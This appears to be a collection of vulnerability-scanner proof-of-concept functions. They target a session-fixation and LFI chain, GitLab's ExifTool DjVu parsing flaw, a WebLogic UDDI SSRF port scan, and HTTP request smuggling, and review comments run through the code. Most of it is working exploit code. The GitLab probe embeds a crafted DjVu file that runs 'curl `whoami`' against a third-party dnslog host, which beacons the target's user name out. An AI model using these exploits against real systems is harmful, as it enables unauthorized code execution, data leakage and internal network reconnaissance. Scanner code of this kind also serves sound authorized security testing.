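    def _verify(self):
        """Probe the target for the session-fixation + LFI chain this PoC covers.

        Judging by the log messages, the chain is (every helper lives elsewhere
        in the class, so its exact behaviour is not visible here):
          1. ``create_session`` -> obtain a ``SESSID`` cookie from the target
          2. ``fix_session``    -> pin that session on the server side
          3. ``get_rand``       -> fetch a per-session ``rand`` value
          4. ``create_session`` -> "re-break" the session
          5. ``do_lfi``         -> use ``rand`` to read a file through the LFI

        Returns:
            ``self.parse_output(result)``; ``result['VerifyInfo']`` is only set
            when the retrieved file text contains ``root``.

        Any exception raised along the chain is logged and treated as
        "not verified" — one failing probe must not abort the whole scan.
        """
        result = {}
        base_url = self.url

        try:
            logger.info('[-] Creating session..')
            # Context manager: release the pooled connection on every path.
            with requests.Session() as session:
                self.create_session(base_url, session)
                cookies = session.cookies.get_dict()
                logger.info(cookies)
                # Fail with a descriptive message instead of letting a bare
                # KeyError surface as "'SESSID'" in the except block below.
                sessid = cookies.get('SESSID')
                if sessid is None:
                    raise ValueError(
                        'no SESSID cookie issued by {0}'.format(base_url))
                logger.info('[+] Got session: {0}'.format(sessid))

                logger.info('[-] Fixing session..')
                self.fix_session(base_url, session)

                logger.info('[-] Getting rand..')
                rand = self.get_rand(base_url, session)
                logger.info('[+] Got rand: {0}'.format(rand))

                logger.info('[-] Re-breaking session..')
                self.create_session(base_url, session)

                logger.info('[-] Getting file..')
                file_text = self.do_lfi(base_url, session, rand)

                # Guard against a helper returning None: ``'root' in None``
                # raises TypeError, which would be reported as an error rather
                # than as a clean negative.
                # NOTE(review): 'root' alone is a weak signal — it matches any
                # page that merely mentions the word. If do_lfi reads
                # /etc/passwd, matching 'root:' (or 'root:x:') would cut false
                # positives; confirm which file do_lfi targets before tightening.
                if file_text and 'root' in file_text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = base_url
        except Exception as ex:
            logger.error(str(ex))
        return self.parse_output(result)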
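    def _verify(self):
        """Check GitLab's ``/uploads/user`` for the ExifTool DjVu parsing flaw.

        Fetches the sign-in page for its CSRF token, then uploads a crafted
        DjVu file disguised as ``test.jpg``. The target is flagged when the
        response contains ``Failed to process image`` — the message the upload
        path returns once ExifTool has choked on the crafted chunk.

        NOTE(review): the DjVu ``ANTa`` chunk carries a Perl ``qx{...}`` body
        (``curl `whoami`.<dnslog host>``). Detection relies on the response
        string only, not on that callback, so the payload beacons the target's
        user name to a hard-coded third-party dnslog domain for no diagnostic
        gain. The long run of spaces after the command appears to pad the chunk
        to its declared length (``\\x00\\x00\\x01P`` = 0x150), so the command
        cannot be shortened or swapped without re-padding — it is left
        byte-identical here; replace it with a no-op (or your own collaborator
        host) and re-pad before pointing this at real targets.

        Returns:
            ``self.parse_output(result)``; ``result['VerifyInfo']`` carries the
            URL and the POST body on a positive match. (The key is spelled as
            the sibling ``_verify`` implementations spell it; the original
            ``VerfiryInfo`` was a typo.)

        Any network or parse error is swallowed — this is a best-effort probe.
        """
        result = {}
        base = self.url.rstrip("/")
        try:
            with requests.Session() as session:
                r = session.get(base + "/users/sign_in")
                soup = BeautifulSoup(r.text, features="lxml")
                # Rails emits ``<meta name="csrf-token" content="...">``; look it
                # up by name rather than by a fixed position in the <meta> list,
                # which silently breaks as soon as the page layout shifts.
                meta = soup.find("meta", attrs={"name": "csrf-token"})
                token = meta.get("content") if meta is not None else None
                if not token:
                    return self.parse_output(result)
                data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.q3ddlk.dnslog.cn} . \\\n\" b \") )                                                                                                                                                                                                                                                                                                                                                                                                                                     \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
                headers = {
                    "User-Agent":
                    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
                    "Connection": "close",
                    "Content-Type":
                    "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
                    "X-CSRF-Token": token,
                    "Accept-Encoding": "gzip, deflate"
                }
                flag = 'Failed to process image'
                # The body holds raw 0x80-0xFF bytes; encode as latin-1 explicitly
                # so each code point maps to exactly one byte on the wire instead
                # of relying on http.client's implicit str handling.
                req = session.post(base + "/uploads/user",
                                   data=data.encode("latin-1"),
                                   headers=headers)
                if flag in req.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Postdata'] = data
        except Exception:
            # Best-effort probe: any failure is reported as "not verified".
            pass

        return self.parse_output(result)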
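        def ssrf(target, ports=None):
            """Probe WebLogic's UDDI Explorer for the SearchPublicRegistries SSRF.

            ``SetupUDDIExplorer.jsp`` leaks the host WebLogic expects its UDDI
            listener on; that host is then supplied as the ``operator`` URL for
            each port in ``ports`` and the error text WebLogic echoes back is
            used to tell an open port from a closed one.

            Args:
                target: base URL of the WebLogic instance (``scheme://host:port``).
                ports: comma-separated string or iterable of ports to test;
                    defaults to the original fixed list.

            Returns:
                ``(status, ssrf_ip, results)`` — ``status`` is True when at least
                one port produced the open-port signature, ``ssrf_ip`` is the host
                taken from the setup page ('' when absent) and ``results`` is a
                comma-joined string of the ports judged open.

            Any unexpected error is swallowed and reported as ``(False, '', '')``;
            this is a best-effort scanner step.
            """
            # Point this at an intercepting proxy when debugging, e.g.
            # {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
            proxies = None
            headers = {
                'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
                'Connection': 'close',
            }
            timeout = 5
            if ports is None:
                ports = '21,22,23,80,443,1521,3306,3389,8080,7001,17001'
            if isinstance(ports, str):
                ports = ports.split(',')
            status, ssrf_ip, results = False, '', []
            search_url = ('{}/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{}:{}'
                          '&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor='
                          '&selfor=Business+location&btnSubmit=Search')
            try:
                with req.Session() as s:
                    r_test = s.get('{}/uddiexplorer/SetupUDDIExplorer.jsp'.format(target),
                                   headers=headers, timeout=timeout, proxies=proxies)
                    if r_test.status_code == 200:
                        # Match against the decoded text: on Python 3 ``.content``
                        # is bytes, and a str pattern against bytes raises
                        # TypeError, which the outer except would silently turn
                        # into "not vulnerable".
                        match = re.search(r'http://(.*)/uddi/uddilistener', r_test.text)
                        if match and match.group(1) != '':
                            ssrf_ip = match.group(1).split(':')[0]
                            for port in ports:
                                try:
                                    url = search_url.format(target, ssrf_ip, port)
                                    r = s.get(url, headers=headers,
                                              timeout=timeout, proxies=proxies)
                                    body = r.text
                                    # 404: the JSP was removed, nothing to exploit.
                                    # "IO Exception on sendMessage" is treated the
                                    # same way (as in the original logic) — stop.
                                    if r.status_code == 404 or 'IO Exception on sendMessage' in body:
                                        break
                                    # Open port: WebLogic reached it but got a
                                    # non-SOAP reply. Closed/unreachable ports show
                                    # "No route to host" / "but could not connect".
                                    if ('weblogic.uddi.client.structures.exception.XML_SoapException' in body
                                            and 'No route to host' not in body
                                            and 'but could not connect' not in body):
                                        results.append(str(port))
                                        status = True
                                # A timeout or connection error on one port just
                                # skips that port.
                                except req.exceptions.ReadTimeout:
                                    continue
                                except req.exceptions.ConnectionError:
                                    continue
            except Exception:
                pass

            return (status, ssrf_ip, ','.join(results))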
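 def send_cl_payload(self, url, header, payload):
     """Send one CL-CL (duplicate Content-Length) request-smuggling probe.

     The request is built with ``requests.Request`` and its prepared headers
     are then *replaced wholesale* by ``header``. That is deliberate: the
     caller supplies the exact, possibly malformed, header set (presumably
     including the Content-Length value(s) the CL-CL test needs) and nothing
     here is allowed to normalise it.

     Args:
         url: target URL.
         header: complete header mapping to send as-is.
         payload: raw request body; should match what ``header`` claims.

     Returns:
         False when the server answers 400 (it rejected the ambiguous request)
         or when the request fails outright; True for any other status. A True
         result only means "not rejected" — it is not by itself proof of a
         smuggling vulnerability, so pair it with the timing check.

     TLS certificate verification is disabled (``verify=False``) so that
     self-signed scan targets can be reached; do not reuse this as a client
     that must trust the peer.
     """
     req = requests.Request('POST', url, data=payload)
     prepped = req.prepare()
     prepped.headers = header
     try:
         # Context manager: release the pooled connection on every path.
         with requests.Session() as sess:
             resp = sess.send(prepped, verify=False, timeout=10)
     except Exception as e:
         print(e.args)
         return False
     # 400 == the server refused the duplicate/ambiguous Content-Length.
     return resp.status_code != 400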
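 def send_payload(self, url, headers=None, payload=""):
     """Send a probe request and report how long the server took to answer.

     Built via ``requests.Request``/``prepare`` so that ``headers`` replaces
     the prepared header set verbatim — the smuggling probes depend on the
     headers going out exactly as given, with nothing added or fixed.

     Args:
         url: target URL.
         headers: full header mapping to send as-is; defaults to an empty
             dict. (The original signature used a mutable ``{}`` default,
             a shared-state hazard; ``None`` preserves the behaviour safely.)
         payload: raw HTTP body.

     Returns:
         Response latency in seconds (``resp.elapsed``, i.e. time until the
         response headers arrived); the configured timeout when the read timed
         out — the "server hung waiting for the desynced body" signal the
         caller looks for; ``None`` when the connection itself failed
         (requests raises connect timeouts as a ``ConnectionError`` subclass,
         so they land in that branch too).

     TLS verification is disabled on purpose (scanner against arbitrary targets).
     """
     if headers is None:
         headers = {}
     # Single source of truth: the value returned on ReadTimeout must equal
     # the timeout actually handed to requests.
     timeout = 10
     req = requests.Request('POST', url, data=payload)
     prepped = req.prepare()
     prepped.headers = headers
     resp_time = 0
     try:
         with requests.Session() as s:
             resp = s.send(prepped, verify=False, timeout=timeout)
         resp_time = resp.elapsed.total_seconds()
     except requests.exceptions.ReadTimeout as e:
         print(e.args)
         resp_time = timeout
     except requests.exceptions.ConnectionError as ex:
         print("failed to connect")
         print(ex.args)
         return None
     return resp_time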